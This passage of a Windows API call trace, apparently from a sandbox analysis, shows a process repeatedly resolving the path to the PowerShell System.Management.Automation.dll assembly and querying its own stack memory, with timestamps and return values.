lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25daa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.620] GetLastError () returned 0x0 [0044.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.621] GetLastError () returned 0x0 [0044.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.621] GetLastError () returned 0x0 [0044.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.621] GetLastError () returned 0x0 [0044.621] VirtualQuery (in: lpAddress=0x25d040, lpBuffer=0x25e040, dwLength=0x1c | out: lpBuffer=0x25e040*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.621] GetLastError () returned 0x0 [0044.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.621] GetLastError () returned 0x0 [0044.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.621] GetLastError () returned 0x0 [0044.621] VirtualQuery (in: lpAddress=0x25d040, lpBuffer=0x25e040, dwLength=0x1c | out: lpBuffer=0x25e040*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.621] GetLastError () returned 0x0 [0044.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.621] GetLastError () returned 0x0 [0044.621] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.621] GetLastError () returned 0x0 [0044.621] VirtualQuery (in: lpAddress=0x25d040, lpBuffer=0x25e040, dwLength=0x1c | out: lpBuffer=0x25e040*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.621] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.621] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.622] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.622] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.622] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.622] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.622] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.622] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.622] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.622] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.623] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.623] VirtualQuery (in: lpAddress=0x25ce7c, lpBuffer=0x25de7c, dwLength=0x1c | out: lpBuffer=0x25de7c*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.623] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.623] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.623] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.623] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.623] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x2a7bd9d1, Data2=0xb396, Data3=0x45d7, Data4=([0]=0x89, [1]=0x72, [2]=0x12, [3]=0xfc, [4]=0x29, [5]=0x80, [6]=0x3a, [7]=0xfa))) returned 0x0 [0044.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.623] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xfdbcd5f3, Data2=0xef49, Data3=0x49b3, Data4=([0]=0xbc, [1]=0x7f, [2]=0x4c, [3]=0x8c, [4]=0x7c, [5]=0x62, [6]=0xa6, [7]=0x7c))) returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.624] GetLastError () returned 0x0 [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] VirtualQuery (in: lpAddress=0x25cc34, lpBuffer=0x25dc34, dwLength=0x1c | out: lpBuffer=0x25dc34*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] VirtualQuery (in: lpAddress=0x25cc34, lpBuffer=0x25dc34, dwLength=0x1c | out: lpBuffer=0x25dc34*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.625] VirtualQuery (in: lpAddress=0x25cc70, lpBuffer=0x25dc70, dwLength=0x1c | out: lpBuffer=0x25dc70*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.625] GetLastError () returned 0x0 [0044.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.626] GetLastError () returned 0x0 [0044.626] VirtualQuery (in: lpAddress=0x25cc34, lpBuffer=0x25dc34, dwLength=0x1c | out: lpBuffer=0x25dc34*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.626] VirtualQuery (in: lpAddress=0x25cc70, lpBuffer=0x25dc70, dwLength=0x1c | out: lpBuffer=0x25dc70*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d628, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.626] GetLastError () returned 0x0 [0044.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.626] GetLastError () returned 0x0 [0044.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5d8, lpFilePart=0x0 | out: 